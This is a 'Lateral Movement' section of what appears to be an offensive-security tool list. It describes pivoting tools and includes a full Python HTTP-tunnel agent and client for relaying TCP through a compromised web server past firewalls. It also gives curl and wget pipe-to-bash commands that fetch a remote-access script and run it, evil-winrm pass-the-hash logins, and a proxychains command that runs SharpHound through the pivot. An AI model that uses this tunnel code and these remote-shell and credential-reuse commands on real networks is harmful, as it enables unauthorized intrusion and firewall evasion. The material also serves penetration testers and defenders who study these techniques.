Lateral Movement
Neo-reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
pivotnacci: Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a SOCKS server that communicates with HTTP agents. The architecture looks like the following:
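The agent/client split that Tunna, Neo-reGeorg and pivotnacci all share, as an added example that is not code from any of those projects: a small web-side agent opens TCP sockets toward internal hosts on the operator's behalf and relays bytes inside HTTP POST bodies, and a client class drives one TCP session through it. The /agent path, the cmd/id/host/port parameters and the loopback echo service standing in for an internal host are constructed for this illustration; a real tool adds a SOCKS front end, encryption of the tunnel payload and long-polling instead of this naive poll loop.

```python
import itertools
import socket
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Agent state: session id -> TCP socket the agent opened toward the internal host.
SESSIONS = {}
_IDS = itertools.count(1)
_LOCK = threading.Lock()


class AgentHandler(BaseHTTPRequestHandler):
    """Web-side agent. Every request carries cmd=connect|send|recv|close (constructed protocol)."""

    def log_message(self, *args):  # silence per-request logging
        pass

    def do_POST(self):
        q = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        cmd = q.get("cmd", [""])[0]
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        out = b""
        if cmd == "connect":
            # The agent, not the operator's box, dials the internal target.
            s = socket.create_connection((q["host"][0], int(q["port"][0])), timeout=5)
            s.settimeout(0.2)  # short timeout so recv polls return quickly
            with _LOCK:
                sid = str(next(_IDS))
                SESSIONS[sid] = s
            out = sid.encode()
        elif cmd == "send":
            SESSIONS[q["id"][0]].sendall(body)
        elif cmd == "recv":
            try:
                out = SESSIONS[q["id"][0]].recv(65536)
            except socket.timeout:
                out = b""  # nothing pending; the client polls again
        elif cmd == "close":
            with _LOCK:
                s = SESSIONS.pop(q["id"][0], None)
            if s:
                s.close()
        self.send_response(200)
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)


class HttpTunnel:
    """Client side: one TCP session to (host, port) carried entirely in HTTP POSTs to the agent."""

    def __init__(self, agent_url, host, port):
        self.url = agent_url
        # No proxies: talk straight to the agent even if http_proxy is set in the environment.
        self.opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
        self.sid = self._call("connect", host=host, port=port).decode()

    def _call(self, cmd, data=b"", **params):
        params["cmd"] = cmd
        req = urllib.request.Request(self.url + "?" + urllib.parse.urlencode(params),
                                     data=data, method="POST")
        with self.opener.open(req, timeout=5) as resp:
            return resp.read()

    def send(self, data):
        self._call("send", data, id=self.sid)

    def recv(self, tries=10):
        for _ in range(tries):  # poll; a real tool keeps a long-poll reader thread
            chunk = self._call("recv", id=self.sid)
            if chunk:
                return chunk
        return b""

    def close(self):
        self._call("close", id=self.sid)


def start_echo_server():
    """Constructed stand-in for an internal host: echoes what it receives. Returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen()

    def serve(conn):
        with conn:
            while data := conn.recv(65536):
                conn.sendall(data)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=serve, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_agent():
    """Run the agent on a loopback port (on an engagement it sits on the bastion web server)."""
    httpd = ThreadingHTTPServer(("127.0.0.1", 0), AgentHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d/agent" % httpd.server_address[1]


def demo(payload=b"hello through the DMZ"):
    """End-to-end run: client -> HTTP -> agent -> TCP -> internal host, and back."""
    tunnel = HttpTunnel(start_agent(), "127.0.0.1", start_echo_server())
    tunnel.send(payload)
    reply = tunnel.recv()
    tunnel.close()
    return reply


if __name__ == "__main__":
    print(demo())
```

Everything the operator's machine sends is an ordinary POST to the web server, which is why these tools pass through firewalls that only allow HTTP to the DMZ; the only outbound connection from the DMZ is the one the agent makes to the internal target.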

ngrok: One command exposes a local server at an instant public URL through any NAT or firewall (a reverse tunnel via the ngrok relay).
gsocket: The Global Socket Toolkit lets two hosts that are both behind NAT/firewalls establish an end-to-end encrypted TCP connection with each other.
Use either one of these two commands to deploy:
bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"

Use either one of these two commands to uninstall:
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
Access the remote host from anywhere in the world, using the secret the deploy script printed (ExampleSecretChangeMe is a placeholder):
$ gs-netcat -s ExampleSecretChangeMe -i

evil-winrm: A WinRM shell for pentesting. Authenticate with a password (-p), an NTLM hash for pass-the-hash (-H), or a domain account:
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd'
proxychains (Windows): -f names a proxychains.conf whose proxy list points at the SOCKS server your pivot tool exposes, so the wrapped program (here SharpHound) reaches the internal network through the pivot:
.\proxychains_win32_x64.exe -f .\proxychains.conf C:\Users\IEUser\Downloads\SharpHound.exe --collectionmethods All